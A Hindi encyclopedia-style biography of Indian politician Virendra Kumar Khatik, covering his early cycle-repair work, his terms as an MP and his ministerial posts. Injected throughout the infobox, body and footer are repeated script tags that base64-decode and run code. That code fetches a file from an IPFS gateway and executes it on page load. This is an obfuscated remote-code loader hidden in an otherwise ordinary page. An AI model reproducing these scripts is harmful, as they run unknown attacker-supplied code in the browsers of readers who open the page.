वीरेन्द्र कुमार खटीक
वीरेन्द्र कुमार खटीक
| |
पूरा नाम | वीरेन्द्र कुमार खटीक |
जन्म | 27 फ़रवरी, 1954 |
जन्म भूमि | ज़िला सागर, मध्य प्रदेश |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ |
पार्टी | भारतीय जनता पार्टी |
पद | सामाजिक न्याय और अधिकारिता मंत्री- 7 जुलाई, 2021 से महिला एवं बाल विकास राज्य मंत्री- 3 सितंबर, 2017 से 24 मई, 2019 तक |
अन्य जानकारी | वीरेन्द्र कुमार संघ, अखिल भारतीय विद्यार्थी परिषद, विश्व हिन्दू परिषद और भाजपा में विभिन्न पदों पर रहे हैं। सागर संसदीय सीट से 1996 में 11वीं लोकसभा का चुनाव उन्होंने पहली बार जीता था। |
अद्यतन | 16:47, 10 जुलाई 2021 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>वीरेन्द्र कुमार खटीक (अंग्रेज़ी: Virendra Kumar Khatik, जन्म- 27 फ़रवरी, 1954) भारतीय राजनीतिज्ञ और भारत की 17वीं लोकसभा के सांसद हैं। वर्तमान नरेन्द्र मोदी सरकार में वह 'सामाजिक न्याय और अधिकारिता मंत्री' बनाये गये हैं। साल 2019 के चुनावों में वीरेन्द्र कुमार मध्य प्रदेश के टीकमगढ़ से निर्वाचित हुए थे। वे भारतीय जनता पार्टी से संबद्ध हैं। छ: बार सांसद रह चुके डॉ. वीरेन्द्र कुमार को अपनी जनता चौपाल और कार्य कुशलता के लिये जाना जाता है।
परिचय
वीरेन्द्र कुमार खटीक का जन्म 27 फ़रवरी, 1954 में सागर में हुआ था। उनकी पत्नी कमल खटीक गृहिणी हैं। उनका एक बेटा और बेटी है। चाय बनाने वाले से प्रधानमंत्री पद तक पहुंचे नरेन्द्र मोदी के मंत्रिमंडल में अब एक ऐसा चेहरा शामिल हो गया है, जिसने बचपन में पिता के साथ साइकिल के पंक्चर तक बनाए। सागर के पूर्व और टीकमगढ़ के मौजूदा सांसद डॉ. वीरेन्द्र कुमार अपनी सादगी और सीधेपन के लिए जाने जाते हैं। बजाज के पुराने हरे रंग के स्कूटर पर सफेद कुर्ता पजामे पर वे शहर की गलियाें में यूं ही घूमते देखे जाते रहे हैं। अब उनका लोगाें से संपर्क का यही सिलसिला टीकमगढ़ में जारी है।
5वीं से लेकर सागर यूनिवर्सिटी में पढ़ाई के दौरान भी वीरेन्द्र कुमार ने साइकिल रिपेयरिंग का काम किया। दुकान पर शुरुआत में लापरवाही से काम करते थे। कई बार दुकान में पंचर सुधारने के दौरान पिता की डांट भी खानी पड़ती थी। पंचर सुधारने के काम में ध्यान से नहीं करता था तो पिताजी उन्हें अच्छी तरह से पंचर बनाना सिखाते थे। धीरे-धीरे पंचर बनाने से लेकर रिपेयरिंग के सारे काम उन्हें आने लगे तो फिर उन्होंने दुकान की जिम्मेदारी संभाल ली। पंक्चर सुधारने से लेकर केंद्रीय मंत्री बनने तक का उनका सफर राजनीति में एक मिसाल के तौर पर देखा जा रहा है।[1]
राजनीति
वीरेन्द्र कुमार संघ, अखिल भारतीय विद्यार्थी परिषद, विश्व हिन्दू परिषद और भाजपा में विभिन्न पदों पर रहे हैं। सागर संसदीय सीट से 1996 में 11वीं लोकसभा का चुनाव उन्होंने पहली बार जीता था। उसके बाद 12वीं, 13वीं और 14वीं लोकसभा में सागर से प्रतिनिधित्व किया। लोकसभा सीट के नए परिसीमन के बाद टीकमगढ़ लोकसभा सीट पर भी जीत का सिलसिला जारी रहा। अब 15वीं और 16वीं लोकसभा में भी उन्होंने इसी सीट से प्रतिनिधित्व किया। सागर के कलेक्ट्रेट परिसर में वीरेन्द्र कुमार ने 'जनता दरबार' की शुरुआत की थी और इसी से उन्हें प्रसिद्धि मिली।
स्कूटर है पहचान
वीरेन्द्र कुमार खटीक की एक और पहचान है। वह है उनका सालों पुराना स्कूटर। वह जब सागर से सांसद थे तो अपने पुराने स्कूटर से घूमा करते थे। उनकी यही सादगी उनकी पहचान बन गयी। वे सागर से सांसद रहे हों या फिर मौजूदा टीकमगढ सांसद, उनका स्कूटर उनके साथ रहता है। कई कार्यक्रमों में स्कूटर से ही पहुंचते हैं, जबकि कार का इस्तेमाल दूर जाने के लिए ही करते हैं।
मुख्य बिन्दु
- वीरेन्द्र कुमार टीकमगढ़ से 7वीं बार सांसद चुने गए हैं।
- जेपी आंदोलन के दौरान वह 16 महीने जेल काट चुके हैं।
- वह दलित समुदाय से आते हैं। उन्होंने अर्थशास्त्र में एमए और चाइल्ड लेबर में पीएचडी की है।
- बीना में रेलवे की जमीन से अतिक्रमण हटाए जाने के दौरान हुए लाठीचार्ज में वह घायल हुए थे।
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
- ↑ कभी बनाते थे साइकिल की पंक्चर, अब बनेंगे मोदी सरकार में मिनिस्टर (हिंदी) bhaskar.com। अभिगमन तिथि: 10 जुलाई, 2021।
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
- प्रारम्भिक अवस्था
- नरेन्द्र मोदी का मंत्रिमण्डल
- राजनीतिज्ञ
- राजनेता
- जीवनी साहित्य
- भारतीय जनता पार्टी
- प्रसिद्ध व्यक्तित्व
- प्रसिद्ध व्यक्तित्व कोश
- लोकसभा सांसद
- चरित कोश
- राजनीति कोश
- मध्य प्रदेश के लोकसभा सांसद
- ग्यारहवीं लोकसभा सांसद
- बारहवीं लोकसभा सांसद
- तेरहवीं लोकसभा सांसद
- चौदहवीं लोकसभा सांसद
- पंद्रहवीं लोकसभा सांसद
- सोलहवीं लोकसभा सांसद
- सत्रहवीं लोकसभा सांसद